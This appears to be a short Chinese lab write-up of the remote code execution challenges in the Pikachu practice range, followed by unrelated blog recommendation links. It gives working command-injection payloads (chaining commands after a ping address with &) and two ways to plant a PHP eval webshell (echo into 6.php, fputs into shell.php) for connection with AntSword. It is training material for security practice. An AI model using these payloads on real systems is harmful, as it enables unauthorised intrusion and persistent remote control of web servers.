Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
flex88881 分钟前
一个专为 Windows 用户设计的配置文件集合提供类似 Unix 环境的美化和功能增强。
服务器·windows·unix
派葛穆1 小时前
网络-MOXA设备基本操作
运维·网络
Clownseven1 小时前
[服务器备份教程] Rclone实战:自动备份数据到阿里云OSS/腾讯云COS等对象存储
服务器·阿里云·腾讯云
EasyDSS1 小时前
国标GB28181视频平台EasyGBS校园监控方案:多场景应用筑牢安全防线,提升管理效能
网络·人工智能·安全
群联云防护小杜1 小时前
物联网僵尸网络防御:从设备认证到流量染色
运维·服务器·前端·网络·物联网·安全·ddos
Zero two and hiro1 小时前
tomcat一闪而过,按任意键继续以及控制台中文乱码问题
java·服务器·tomcat
Web极客码1 小时前
WordPress搜索引擎优化的最佳重定向插件:入门指南
运维·服务器·前端
中国lanwp2 小时前
在Maven中替换文件内容的插件和方法
服务器·数据库·maven
白初&3 小时前
CVE-2015-4553 Dedecms远程写文件
安全
Kendra9193 小时前
Docker 运维管理
运维·docker·容器
热门推荐
01从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑02KGG转MP3工具|非KGM文件|解密音频03YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】04【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!05组基轨迹建模 GBTM的介绍与实现(Stata 或 R)06Coze扣子平台完整体验和实践(附国内和国际版对比)07Ubuntu24.04安装中文输入法08YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU09DeepSeek各版本说明与优缺点分析10深度学习基础--ResNet网络的讲解,ResNet50的复现(pytorch)以及用复现的ResNet50做鸟类图像分类